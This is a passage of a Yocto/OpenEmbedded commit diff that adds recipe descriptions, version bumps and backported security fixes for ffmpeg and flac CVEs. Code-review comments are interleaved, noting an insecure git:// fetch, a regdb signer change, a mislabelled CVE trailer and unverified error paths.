--- a/meta/recipes-kernel/systemtap/systemtap_git.bb
+++ b/meta/recipes-kernel/systemtap/systemtap_git.bb
@@ -1,9 +1,14 @@
1SUMMARY = "Script-directed dynamic tracing and performance analysis tool for Linux" 1SUMMARY = "Script-directed dynamic tracing and performance analysis tool for Linux"
2DESCRIPTION = "It provides free software infrastructure to simplify the \
3gathering of information about the running Linux system. This assists \
4diagnosis of a performance or functional problem."
2HOMEPAGE = "https://sourceware.org/systemtap/" 5HOMEPAGE = "https://sourceware.org/systemtap/"
3 6
4require systemtap_git.inc 7require systemtap_git.inc
5 8
6SRC_URI += "file://0001-improve-reproducibility-for-c-compiling.patch" 9SRC_URI += "file://0001-improve-reproducibility-for-c-compiling.patch \
10 file://0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch \
11 "
7 12
8DEPENDS = "elfutils" 13DEPENDS = "elfutils"
9 14
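--- a/meta/recipes-kernel/systemtap/systemtap_git.inc
+++ b/meta/recipes-kernel/systemtap/systemtap_git.inc
@@ -3,7 +3,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
 SRCREV = "044a0640985ef007c0b2fb6eaf660d9d51800cda"
 PV = "4.2"
 
-SRC_URI = "git://sourceware.org/git/systemtap.git \
+SRC_URI = "git://sourceware.org/git/systemtap.git;branch=master \
  file://0001-Do-not-let-configure-write-a-python-location-into-th.patch \
  file://0001-Install-python-modules-to-correct-library-dir.patch \
  file://0001-staprun-stapbpf-don-t-support-installing-a-non-root.patch \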
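Review bot: The rewritten `SRC_URI` still carries no `protocol=` parameter, so systemtap is fetched over the plain `git://` transport, which has no server authentication or encryption; the pinned `SRCREV` is then the only integrity control on the fetch. The powertop recipe in this same commit already uses `protocol=https`, so the line could read `SRC_URI = "git://sourceware.org/git/systemtap.git;protocol=https;branch=master \`, assuming the host serves this repository over HTTPS.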
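--- a/meta/recipes-kernel/wireless-regdb/wireless-regdb_2020.11.20.bb
+++ b/meta/recipes-kernel/wireless-regdb/wireless-regdb_2024.01.23.bb
@@ -5,7 +5,7 @@ LICENSE = "ISC"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=07c4f6dea3845b02a18dc00c8c87699c"
 
 SRC_URI = "https://www.kernel.org/pub/software/network/${BPN}/${BP}.tar.xz"
-SRC_URI[sha256sum] = "b4164490d82ff7b0086e812ac42ab27baf57be24324d4c0ee1c5dd6ba27f2a52"
+SRC_URI[sha256sum] = "c8a61c9acf76fa7eb4239e89f640dee3e87098d9f69b4d3518c9c60fc6d20c55"
 
 inherit bin_package allarch
 
@@ -13,7 +13,7 @@ do_install() {
  install -d -m0755 ${D}${nonarch_libdir}/crda
  install -d -m0755 ${D}${sysconfdir}/wireless-regdb/pubkeys
  install -m 0644 regulatory.bin ${D}${nonarch_libdir}/crda/regulatory.bin
- install -m 0644 sforshee.key.pub.pem ${D}${sysconfdir}/wireless-regdb/pubkeys/sforshee.key.pub.pem
+ install -m 0644 wens.key.pub.pem ${D}${sysconfdir}/wireless-regdb/pubkeys/wens.key.pub.pem
 
  install -m 0644 -D regulatory.db ${D}${nonarch_base_libdir}/firmware/regulatory.db
  install -m 0644 regulatory.db.p7s ${D}${nonarch_base_libdir}/firmware/regulatory.db.p7s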
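Review bot: The second hunk replaces the installed public key `sforshee.key.pub.pem` with `wens.key.pub.pem`, so this release of the database is signed by a different key, and nothing in the recipe records that. The `regulatory.db.p7s` installed two lines below is presumably verified by the kernel against certificates built into cfg80211, so a kernel that does not carry the new signer's certificate may reject the updated `regulatory.db`; that is worth confirming for every kernel this branch supports. I would add a comment above the install line, for example `# regdb signer changed upstream: the kernel must carry the matching cfg80211 certificate`. do_install starts and ends outside the hunk.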
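--- a/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb
+++ b/meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb
@@ -1,4 +1,6 @@
 SUMMARY = "ALSA sound library"
+DESCRIPTION = "(Occasionally a.k.a. libasound) is a userspace library that \
+provides a level of abstraction over the /dev interfaces provided by the kernel modules."
 HOMEPAGE = "http://www.alsa-project.org"
 BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
 SECTION = "libs/multimedia"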
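--- a/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb
+++ b/meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb
@@ -1,4 +1,7 @@
 SUMMARY = "ALSA Plugins"
+DESCRIPTION = "Used to create virtual devices that can be used like normal \
+hardware devices but cause extra processing of the sound stream to take place. \
+They are used while configuring ALSA in the .asoundrc file."
 HOMEPAGE = "http://alsa-project.org"
 BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
 SECTION = "multimedia"
@@ -33,7 +36,7 @@ PACKAGECONFIG ??= "\
  speexdsp \
  ${@bb.utils.filter('DISTRO_FEATURES', 'pulseaudio', d)} \
 "
-PACKAGECONFIG[aaf] = "--enable-aaf,--disable-aaf,avtp"
+PACKAGECONFIG[aaf] = "--enable-aaf,--disable-aaf,libavtp"
 PACKAGECONFIG[jack] = "--enable-jack,--disable-jack,jack"
 PACKAGECONFIG[libav] = "--enable-libav,--disable-libav,libav"
 PACKAGECONFIG[maemo-plugin] = "--enable-maemo-plugin,--disable-maemo-plugin"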
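--- a/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb
+++ b/meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb
@@ -1,4 +1,7 @@
 SUMMARY = "Advanced tools for certain ALSA sound card drivers"
+DESCRIPTION = "Package containing a number of tools ranging from envy24control \
+which provides complete control over all devices with an envy24 chip, to \
+firmware loaders for pcmcia, USB and the hdsp devices."
 HOMEPAGE = "http://www.alsa-project.org"
 BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
 SECTION = "console/utils"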
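--- a/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb
+++ b/meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb
@@ -1,4 +1,7 @@
 SUMMARY = "ALSA topology configuration files"
+DESCRIPTION = "Provides a method for audio drivers to load their mixers, \
+routing, PCMs and capabilities from user space at runtime without changing \
+any driver source code."
 HOMEPAGE = "https://alsa-project.org"
 BUGTRACKER = "https://alsa-project.org/wiki/Bug_Tracking"
 LICENSE = "BSD-3-Clause"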
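--- a/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb
+++ b/meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb
@@ -1,4 +1,7 @@
 SUMMARY = "ALSA Use Case Manager configuration"
+DESCRIPTION = "This package contains ALSA Use Case Manager configuration \
+of audio input/output names and routing for specific audio hardware. \
+They can be used with the alsaucm tool. "
 HOMEPAGE = "https://alsa-project.org"
 BUGTRACKER = "https://alsa-project.org/wiki/Bug_Tracking"
 LICENSE = "BSD-3-Clause"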
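--- a/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb
+++ b/meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb
@@ -1,4 +1,6 @@
 SUMMARY = "ALSA sound utilities"
+DESCRIPTION = "collection of small and often extremely powerful applications \
+designed to allow users to control the various parts of the ALSA system."
 HOMEPAGE = "http://www.alsa-project.org"
 BUGTRACKER = "http://alsa-project.org/main/index.php/Bug_Tracking"
 SECTION = "console/utils"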
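--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch
@@ -0,0 +1,61 @@
+From 3bce9e9b3ea35c54bacccc793d7da99ea5157532 Mon Sep 17 00:00:00 2001
+From: Paul B Mahol <onemda@gmail.com>
+Date: Mon, 27 Jan 2020 21:53:08 +0100
+Subject: [PATCH] avformat/tty: add probe function
+
+CVE: CVE-2021-3566
+Signed-off-by: Saloni Jain <salonij@kpit.com>
+
+Upstream-Status: Backport [http://git.videolan.org/?p=ffmpeg.git;a=patch;h=3bce9e9b3ea35c54bacccc793d7da99ea5157532]
+Comment: No changes/refreshing done.
+---
+ libavformat/tty.c | 21 ++++++++++++++++++++-
+ 1 file changed, 20 insertions(+), 1 deletion(-)
+
+diff --git a/libavformat/tty.c b/libavformat/tty.c
+index 8d48f2c45c12..60f7e9f87ee7 100644
+--- a/libavformat/tty.c
++++ b/libavformat/tty.c
+@@ -34,6 +34,13 @@
+ #include "internal.h"
+ #include "sauce.h"
+
++static int isansicode(int x)
++{
++ return x == 0x1B || x == 0x0A || x == 0x0D || (x >= 0x20 && x < 0x7f);
++}
++
++static const char tty_extensions[31] = "ans,art,asc,diz,ice,nfo,txt,vt";
++
+ typedef struct TtyDemuxContext {
+ AVClass *class;
+ int chars_per_frame;
+@@ -42,6 +49,17 @@ typedef struct TtyDemuxContext {
+ AVRational framerate; /**< Set by a private option. */
+ } TtyDemuxContext;
+
++static int read_probe(const AVProbeData *p)
++{
++ int cnt = 0;
++
++ for (int i = 0; i < p->buf_size; i++)
++ cnt += !!isansicode(p->buf[i]);
++
++ return (cnt * 100LL / p->buf_size) * (cnt > 400) *
++ !!av_match_ext(p->filename, tty_extensions);
++}
++
+ /**
+ * Parse EFI header
+ */
+@@ -153,8 +171,9 @@ AVInputFormat ff_tty_demuxer = {
+ .name = "tty",
+ .long_name = NULL_IF_CONFIG_SMALL("Tele-typewriter"),
+ .priv_data_size = sizeof(TtyDemuxContext),
++ .read_probe = read_probe,
+ .read_header = read_header,
+ .read_packet = read_packet,
+- .extensions = "ans,art,asc,diz,ice,nfo,txt,vt",
++ .extensions = tty_extensions,
+ .priv_class = &tty_demuxer_class,
+ };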
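Review bot: In the added `read_probe`, the return expression divides by `p->buf_size` before the `(cnt > 400)` factor is applied, so a probe call with an empty buffer would divide by zero; the multiplication does not short-circuit the division. Whether the probing code in this ffmpeg version can invoke a demuxer's probe with `buf_size == 0` is not visible here and should be confirmed, or the function guarded with `if (p->buf_size <= 0) return 0;` ahead of the loop. The patch header records an unmodified backport, so such a guard would be a local addition and the header would have to say so.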
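--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch
@@ -0,0 +1,53 @@
+From e01d306c647b5827102260b885faa223b646d2d1 Mon Sep 17 00:00:00 2001
+From: James Almer <jamrial@gmail.com>
+Date: Wed, 21 Jul 2021 01:02:44 -0300
+Subject: [PATCH] avcodec/utils: don't return negative values in
+ av_get_audio_frame_duration()
+
+In some extrme cases, like with adpcm_ms samples with an extremely high channel
+count, get_audio_frame_duration() may return a negative frame duration value.
+Don't propagate it, and instead return 0, signaling that a duration could not
+be determined.
+
+CVE: CVE-2021-3566
+Fixes ticket #9312
+Signed-off-by: James Almer <jamrial@gmail.com>
+Signed-off-by: Saloni Jain <salonij@kpit.com>
+
+Upstream-Status: Backport [http://git.videolan.org/?p=ffmpeg.git;a=patch;h=e01d306c647b5827102260b885faa223b646d2d1]
+Comment: No changes/refreshing done.
+---
+ libavcodec/utils.c | 6 ++++--
+ 1 file changed, 4 insertions(+), 2 deletions(-)
+
+diff --git a/libavcodec/utils.c b/libavcodec/utils.c
+index 5fad782f5a..cfc07cbcb8 100644
+--- a/libavcodec/utils.c
++++ b/libavcodec/utils.c
+@@ -810,20 +810,22 @@ static int get_audio_frame_duration(enum AVCodecID id, int sr, int ch, int ba,
+
+ int av_get_audio_frame_duration(AVCodecContext *avctx, int frame_bytes)
+ {
+- return get_audio_frame_duration(avctx->codec_id, avctx->sample_rate,
++ int duration = get_audio_frame_duration(avctx->codec_id, avctx->sample_rate,
+ avctx->channels, avctx->block_align,
+ avctx->codec_tag, avctx->bits_per_coded_sample,
+ avctx->bit_rate, avctx->extradata, avctx->frame_size,
+ frame_bytes);
++ return FFMAX(0, duration);
+ }
+
+ int av_get_audio_frame_duration2(AVCodecParameters *par, int frame_bytes)
+ {
+- return get_audio_frame_duration(par->codec_id, par->sample_rate,
++ int duration = get_audio_frame_duration(par->codec_id, par->sample_rate,
+ par->channels, par->block_align,
+ par->codec_tag, par->bits_per_coded_sample,
+ par->bit_rate, par->extradata, par->frame_size,
+ frame_bytes);
++ return FFMAX(0, duration);
+ }
+
+ #if !HAVE_THREADS
+--
+2.20.1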
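Review bot: The `CVE:` trailer on line 12 of this patch names CVE-2021-3566, which disagrees with the file name CVE-2021-38291.patch and duplicates the identifier already claimed by the tty probe patch added in the same commit. The trailer should read `CVE: CVE-2021-38291`. Anything that reads the trailer rather than the file name, whether a scanner or an auditor, would attribute this fix to the wrong CVE, so the mismatch is worth correcting even though the code change itself is untouched.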
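--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-1475.patch
@@ -0,0 +1,36 @@
+From: Michael Niedermayer <michael@niedermayer.cc>
+Date: Sun, 27 Feb 2022 14:43:04 +0100
+Subject: [PATCH] avcodec/g729_parser: Check channels
+
+Fixes: signed integer overflow: 10 * 808464428 cannot be represented in type 'int'
+Fixes: assertion failure
+Fixes: ticket9651
+
+Reviewed-by: Paul B Mahol <onemda@gmail.com>
+Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>
+(cherry picked from commit 757da974b21833529cc41bdcc9684c29660cdfa8)
+Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>
+
+CVE: CVE-2022-1475
+Upstream-Status: Backport [https://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=e9e2ddbc6c78cc18b76093617f82c920e58a8d1f]
+Comment: Patch is refreshed as per ffmpeg codebase
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+
+---
+ libavcodec/g729_parser.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+Index: ffmpeg-4.2.2/libavcodec/g729_parser.c
+===================================================================
+--- a/libavcodec/g729_parser.c
++++ b/libavcodec/g729_parser.c
+@@ -48,6 +48,9 @@ static int g729_parse(AVCodecParserConte
+ av_assert1(avctx->codec_id == AV_CODEC_ID_G729);
+ /* FIXME: replace this heuristic block_size with more precise estimate */
+ s->block_size = (avctx->bit_rate < 8000) ? G729D_6K4_BLOCK_SIZE : G729_8K_BLOCK_SIZE;
++ // channels > 2 is invalid, we pass the packet on unchanged
++ if (avctx->channels > 2)
++ s->block_size = 0;
+ s->block_size *= avctx->channels;
+ s->duration = avctx->frame_size;
+ }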
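--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3109.patch
@@ -0,0 +1,41 @@
+From 656cb0450aeb73b25d7d26980af342b37ac4c568 Mon Sep 17 00:00:00 2001
+From: Jiasheng Jiang <jiasheng@iscas.ac.cn>
+Date: Tue, 15 Feb 2022 17:58:08 +0800
+Subject: [PATCH] avcodec/vp3: Add missing check for av_malloc
+
+Since the av_malloc() may fail and return NULL pointer,
+it is needed that the 's->edge_emu_buffer' should be checked
+whether the new allocation is success.
+
+Fixes: d14723861b ("VP3: fix decoding of videos with stride > 2048")
+
+CVE: CVE-2022-3109
+Upstream-Status: Backport [https://github.com/FFmpeg/FFmpeg/commit/656cb0450aeb73b25d7d26980af342b37ac4c568]
+Comments: Refreshed hunk
+
+Reviewed-by: Peter Ross <pross@xvid.org>
+Signed-off-by: Jiasheng Jiang <jiasheng@iscas.ac.cn>
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ libavcodec/vp3.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/libavcodec/vp3.c b/libavcodec/vp3.c
+index e9ab54d73677..e2418eb6fa04 100644
+--- a/libavcodec/vp3.c
++++ b/libavcodec/vp3.c
+@@ -2740,8 +2740,13 @@
+ if (ff_thread_get_buffer(avctx, &s->current_frame, AV_GET_BUFFER_FLAG_REF) < 0)
+ goto error;
+
+- if (!s->edge_emu_buffer)
++ if (!s->edge_emu_buffer) {
+ s->edge_emu_buffer = av_malloc(9 * FFABS(s->current_frame.f->linesize[0]));
++ if (!s->edge_emu_buffer) {
++ ret = AVERROR(ENOMEM);
++ goto error;
++ }
++ }
+
+ if (s->keyframe) {
+ if (!s->theora) {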
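Review bot: The new failure branch assigns `ret = AVERROR(ENOMEM)` before `goto error`, but the `error:` label lies outside the hunk, so it cannot be seen whether the function returns `ret` there or a fixed value. The `ff_thread_get_buffer` failure two lines above jumps to the same label without assigning `ret`, which suggests the label may not use it. It is worth confirming against the 4.2.2 source that the ENOMEM code actually reaches the caller, and recording the answer next to the `Comments: Refreshed hunk` line in the header. The enclosing function starts and ends outside the hunk.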
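--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3341.patch
@@ -0,0 +1,67 @@
+From 9cf652cef49d74afe3d454f27d49eb1a1394951e Mon Sep 17 00:00:00 2001
+From: Jiasheng Jiang <jiasheng@iscas.ac.cn>
+Date: Wed, 23 Feb 2022 10:31:59 +0800
+Subject: [PATCH] avformat/nutdec: Add check for avformat_new_stream
+
+Check for failure of avformat_new_stream() and propagate
+the error code.
+
+Signed-off-by: Michael Niedermayer <michael@niedermayer.cc>
+
+CVE: CVE-2022-3341
+
+Upstream-Status: Backport [https://github.com/FFmpeg/FFmpeg/commit/9cf652cef49d74afe3d454f27d49eb1a1394951e]
+
+Comments: Refreshed Hunk
+Signed-off-by: Narpat Mali <narpat.mali@windriver.com>
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ libavformat/nutdec.c | 16 ++++++++++++----
+ 1 file changed, 12 insertions(+), 4 deletions(-)
+
+diff --git a/libavformat/nutdec.c b/libavformat/nutdec.c
+index 0a8a700acf..f9ad2c0af1 100644
+--- a/libavformat/nutdec.c
++++ b/libavformat/nutdec.c
+@@ -351,8 +351,12 @@ static int decode_main_header(NUTContext *nut)
+ ret = AVERROR(ENOMEM);
+ goto fail;
+ }
+- for (i = 0; i < stream_count; i++)
+- avformat_new_stream(s, NULL);
++ for (i = 0; i < stream_count; i++) {
++ if (!avformat_new_stream(s, NULL)) {
++ ret = AVERROR(ENOMEM);
++ goto fail;
++ }
++ }
+
+ return 0;
+ fail:
+@@ -793,19 +793,23 @@
+ NUTContext *nut = s->priv_data;
+ AVIOContext *bc = s->pb;
+ int64_t pos;
+- int initialized_stream_count;
++ int initialized_stream_count, ret;
+
+ nut->avf = s;
+
+ /* main header */
+ pos = 0;
++ ret = 0;
+ do {
++ if (ret == AVERROR(ENOMEM))
++ return ret;
++
+ pos = find_startcode(bc, MAIN_STARTCODE, pos) + 1;
+ if (pos < 0 + 1) {
+ av_log(s, AV_LOG_ERROR, "No main startcode found.\n");
+ goto fail;
+ }
+- } while (decode_main_header(nut) < 0);
++ } while ((ret = decode_main_header(nut)) < 0);
+
+ /* stream headers */
+ pos = 0;
+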
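Review bot: In the second hunk the added `if (ret == AVERROR(ENOMEM)) return ret;` leaves the function directly, while the other exit in the same loop uses `goto fail`. The `fail:` label is outside the hunk, so the cleanup it performs cannot be seen here; confirm that nothing it releases has been set up by this point, and add a comment such as `/* nothing to unwind yet: return the allocation failure as-is */` above the early return. The hunk header `@@ -793,19 +793,23 @@` also keeps the same start line on both sides although the first hunk adds four lines, which `patch` tolerates but which shows the hunk was edited by hand and deserves a build-time fuzz check.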
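--- /dev/null
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-48434.patch
@@ -0,0 +1,136 @@
+From d4b7b3c03ee2baf0166ce49dff17ec9beff684db Mon Sep 17 00:00:00 2001
+From: Anton Khirnov <anton@khirnov.net>
+Date: Fri, 2 Sep 2022 22:21:27 +0200
+Subject: [PATCH] lavc/pthread_frame: avoid leaving stale hwaccel state in
+ worker threads
+
+This state is not refcounted, so make sure it always has a well-defined
+owner.
+
+Remove the block added in 091341f2ab5bd35ca1a2aae90503adc74f8d3523, as
+this commit also solves that issue in a more general way.
+
+(cherry picked from commit cc867f2c09d2b69cee8a0eccd62aff002cbbfe11)
+Signed-off-by: Anton Khirnov <anton@khirnov.net>
+(cherry picked from commit 35aa7e70e7ec350319e7634a30d8d8aa1e6ecdda)
+Signed-off-by: Anton Khirnov <anton@khirnov.net>
+(cherry picked from commit 3bc28e9d1ab33627cea3c632dd6b0c33e22e93ba)
+Signed-off-by: Anton Khirnov <anton@khirnov.net>
+
+CVE: CVE-2022-48434
+Upstream-Status: Backport [https://git.ffmpeg.org/gitweb/ffmpeg.git/commit/d4b7b3c03ee2baf0166ce49dff17ec9beff684db]
+Signed-off-by: Ranjitsinh Rathod ranjitsinh.rathod@kpit.com
+Comment: Hunk#6 refreshed to backport changes and other to remove patch-fuzz warnings
+---
+ libavcodec/pthread_frame.c | 46 +++++++++++++++++++++++++++++---------
+ 1 file changed, 35 insertions(+), 11 deletions(-)
+
+diff --git a/libavcodec/pthread_frame.c b/libavcodec/pthread_frame.c
+index 36ac0ac..bbc5ba6 100644
+--- a/libavcodec/pthread_frame.c
++++ b/libavcodec/pthread_frame.c
+@@ -135,6 +135,12 @@ typedef struct FrameThreadContext {
+ * Set for the first N packets, where N is the number of threads.
+ * While it is set, ff_thread_en/decode_frame won't return any results.
+ */
++
++ /* hwaccel state is temporarily stored here in order to transfer its ownership
++ * to the next decoding thread without the need for extra synchronization */
++ const AVHWAccel *stash_hwaccel;
++ void *stash_hwaccel_context;
++ void *stash_hwaccel_priv;
+ } FrameThreadContext;
+
+ #define THREAD_SAFE_CALLBACKS(avctx) \
+@@ -211,9 +217,17 @@ static attribute_align_arg void *frame_worker_thread(void *arg)
+ ff_thread_finish_setup(avctx);
+
+ if (p->hwaccel_serializing) {
++ /* wipe hwaccel state to avoid stale pointers lying around;
++ * the state was transferred to FrameThreadContext in
++ * ff_thread_finish_setup(), so nothing is leaked */
++ avctx->hwaccel = NULL;
++ avctx->hwaccel_context = NULL;
++ avctx->internal->hwaccel_priv_data = NULL;
++
+ p->hwaccel_serializing = 0;
+ pthread_mutex_unlock(&p->parent->hwaccel_mutex);
+ }
++ av_assert0(!avctx->hwaccel);
+
+ if (p->async_serializing) {
+ p->async_serializing = 0;
+@@ -275,14 +289,10 @@ static int update_context_from_thread(AVCodecContext *dst, AVCodecContext *src,
+ dst->color_range = src->color_range;
+ dst->chroma_sample_location = src->chroma_sample_location;
+
+- dst->hwaccel = src->hwaccel;
+- dst->hwaccel_context = src->hwaccel_context;
+-
+ dst->channels = src->channels;
+ dst->sample_rate = src->sample_rate;
+ dst->sample_fmt = src->sample_fmt;
+ dst->channel_layout = src->channel_layout;
+- dst->internal->hwaccel_priv_data = src->internal->hwaccel_priv_data;
+
+ if (!!dst->hw_frames_ctx != !!src->hw_frames_ctx ||
+ (dst->hw_frames_ctx && dst->hw_frames_ctx->data != src->hw_frames_ctx->data)) {
+@@ -415,6 +425,12 @@ static int submit_packet(PerThreadContext *p, AVCodecContext *user_avctx,
+ pthread_mutex_unlock(&p->mutex);
+ return err;
+ }
++
++ /* transfer hwaccel state stashed from previous thread, if any */
++ av_assert0(!p->avctx->hwaccel);
++ FFSWAP(const AVHWAccel*, p->avctx->hwaccel, fctx->stash_hwaccel);
++ FFSWAP(void*, p->avctx->hwaccel_context, fctx->stash_hwaccel_context);
++ FFSWAP(void*, p->avctx->internal->hwaccel_priv_data, fctx->stash_hwaccel_priv);
+ }
+
+ av_packet_unref(&p->avpkt);
+@@ -616,6 +632,14 @@ void ff_thread_finish_setup(AVCodecContext *avctx) {
+ async_lock(p->parent);
+ }
+
++ /* save hwaccel state for passing to the next thread;
++ * this is done here so that this worker thread can wipe its own hwaccel
++ * state after decoding, without requiring synchronization */
++ av_assert0(!p->parent->stash_hwaccel);
++ p->parent->stash_hwaccel = avctx->hwaccel;
++ p->parent->stash_hwaccel_context = avctx->hwaccel_context;
++ p->parent->stash_hwaccel_priv = avctx->internal->hwaccel_priv_data;
++
+ pthread_mutex_lock(&p->progress_mutex);
+ if(atomic_load(&p->state) == STATE_SETUP_FINISHED){
+ av_log(avctx, AV_LOG_WARNING, "Multiple ff_thread_finish_setup() calls\n");
+@@ -657,13 +681,6 @@ void ff_frame_thread_free(AVCodecContext *avctx, int thread_count)
+
+ park_frame_worker_threads(fctx, thread_count);
+
+- if (fctx->prev_thread && fctx->prev_thread != fctx->threads)
+- if (update_context_from_thread(fctx->threads->avctx, fctx->prev_thread->avctx, 0) < 0) {
+- av_log(avctx, AV_LOG_ERROR, "Final thread update failed\n");
+- fctx->prev_thread->avctx->internal->is_copy = fctx->threads->avctx->internal->is_copy;
+- fctx->threads->avctx->internal->is_copy = 1;
+- }
+-
+ for (i = 0; i < thread_count; i++) {
+ PerThreadContext *p = &fctx->threads[i];
+
+@@ -713,6 +730,13 @@ void ff_frame_thread_free(AVCodecContext *avctx, int thread_count)
+ pthread_mutex_destroy(&fctx->async_mutex);
+ pthread_cond_destroy(&fctx->async_cond);
+
++ /* if we have stashed hwaccel state, move it to the user-facing context,
++ * so it will be freed in avcodec_close() */
++ av_assert0(!avctx->hwaccel);
++ FFSWAP(const AVHWAccel*, avctx->hwaccel, fctx->stash_hwaccel);
++ FFSWAP(void*, avctx->hwaccel_context, fctx->stash_hwaccel_context);
++ FFSWAP(void*, avctx->internal->hwaccel_priv_data, fctx->stash_hwaccel_priv);
++
+ av_freep(&avctx->internal->thread_ctx);
+
+ if (avctx->priv_data && avctx->codec && avctx->codec->priv_class)
+--
+2.25.1
+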
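Review bot: The `ff_frame_thread_free` hunk at patch lines 106-116 deletes the whole final `update_context_from_thread(fctx->threads->avctx, fctx->prev_thread->avctx, 0)` call, and the `update_context_from_thread` hunk above shows that this function copies more than hwaccel state. The header says hunk 6 was refreshed by hand for this tree, so it should be confirmed that nothing else in 4.2.2 relied on that last synchronisation before the threads are freed. The added `av_assert0` checks are always compiled in, so a violated ownership invariant now aborts the process rather than leaving a stale pointer; a frame-threaded decode test with hardware acceleration enabled would exercise both points. The sign-off on patch line 22 is also missing the angle brackets around the address.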
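--- a/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb
@@ -27,7 +27,13 @@ SRC_URI = "https://www.ffmpeg.org/releases/${BP}.tar.xz \
  file://mips64_cpu_detection.patch \
  file://CVE-2020-12284.patch \
  file://0001-libavutil-include-assembly-with-full-path-from-sourc.patch \
- "
+ file://CVE-2021-3566.patch \
+ file://CVE-2021-38291.patch \
+ file://CVE-2022-1475.patch \
+ file://CVE-2022-3109.patch \
+ file://CVE-2022-3341.patch \
+ file://CVE-2022-48434.patch \
+ "
 SRC_URI[md5sum] = "348956fc2faa57a2f79bbb84ded9fbc3"
 SRC_URI[sha256sum] = "cb754255ab0ee2ea5f66f8850e1bd6ad5cac1cd855d0a2f4990fb8c668b0d29c"
 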
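--- /dev/null
+++ b/meta/recipes-multimedia/flac/files/CVE-2020-22219.patch
@@ -0,0 +1,197 @@
+From 579ff6922089cbbbd179619e40e622e279bd719f Mon Sep 17 00:00:00 2001
+From: Martijn van Beurden <mvanb1@gmail.com>
+Date: Wed, 3 Aug 2022 13:52:19 +0200
+Subject: [PATCH] flac: Add and use _nofree variants of safe_realloc functions
+
+Parts of the code use realloc like
+
+x = safe_realloc(x, somesize);
+
+when this is the case, the safe_realloc variant used must free the
+old memory block in case it fails, otherwise it will leak. However,
+there are also instances in the code where handling is different:
+
+if (0 == (x = safe_realloc(y, somesize)))
+ return false
+
+in this case, y should not be freed, as y is not set to NULL we
+could encounter double frees. Here the safe_realloc_nofree
+functions are used.
+
+Upstream-Status: Backport [https://github.com/xiph/flac/commit/21fe95ee828b0b9b944f6aa0bb02d24fbb981815]
+CVE: CVE-2020-22219
+
+Signed-off-by: Meenali Gupta <meenali.gupta@windriver.com>
+---
+ include/share/alloc.h | 41 +++++++++++++++++++++++++++++++----
+ src/flac/encode.c | 4 ++--
+ src/flac/foreign_metadata.c | 2 +-
+ src/libFLAC/bitwriter.c | 2 +-
+ src/libFLAC/metadata_object.c | 2 +-
+ src/plugin_common/tags.c | 2 +-
+ src/share/utf8/iconvert.c | 2 +-
+ 7 files changed, 44 insertions(+), 11 deletions(-)
+
+diff --git a/include/share/alloc.h b/include/share/alloc.h
+index 914de9b..55bdd1d 100644
+--- a/include/share/alloc.h
++++ b/include/share/alloc.h
+@@ -161,17 +161,30 @@ static inline void *safe_realloc_(void *ptr, size_t size)
+ free(oldptr);
+ return newptr;
+ }
+-static inline void *safe_realloc_add_2op_(void *ptr, size_t size1, size_t size2)
++static inline void *safe_realloc_nofree_add_2op_(void *ptr, size_t size1, size_t size2)
++{
++ size2 += size1;
++ if(size2 < size1)
++ return 0;
++ return realloc(ptr, size2);
++}
++
++static inline void *safe_realloc_add_3op_(void *ptr, size_t size1, size_t size2, size_t size3)
+ {
+ size2 += size1;
+ if(size2 < size1) {
+ free(ptr);
+ return 0;
+ }
+- return realloc(ptr, size2);
++ size3 += size2;
++ if(size3 < size2) {
++ free(ptr);
++ return 0;
++ }
++ return safe_realloc_(ptr, size3);
+ }
+
+-static inline void *safe_realloc_add_3op_(void *ptr, size_t size1, size_t size2, size_t size3)
++static inline void *safe_realloc_nofree_add_3op_(void *ptr, size_t size1, size_t size2, size_t size3)
+ {
+ size2 += size1;
+ if(size2 < size1)
+@@ -182,7 +195,7 @@ static inline void *safe_realloc_add_3op_(void *ptr, size_t size1, size_t size2,
+ return realloc(ptr, size3);
+ }
+
+-static inline void *safe_realloc_add_4op_(void *ptr, size_t size1, size_t size2, size_t size3, size_t size4)
++static inline void *safe_realloc_nofree_add_4op_(void *ptr, size_t size1, size_t size2, size_t size3, size_t size4)
+ {
+ size2 += size1;
+ if(size2 < size1)
+@@ -205,6 +218,15 @@ static inline void *safe_realloc_mul_2op_(void *ptr, size_t size1, size_t size2)
+ return safe_realloc_(ptr, size1*size2);
+ }
+
++static inline void *safe_realloc_nofree_mul_2op_(void *ptr, size_t size1, size_t size2)
++{
++ if(!size1 || !size2)
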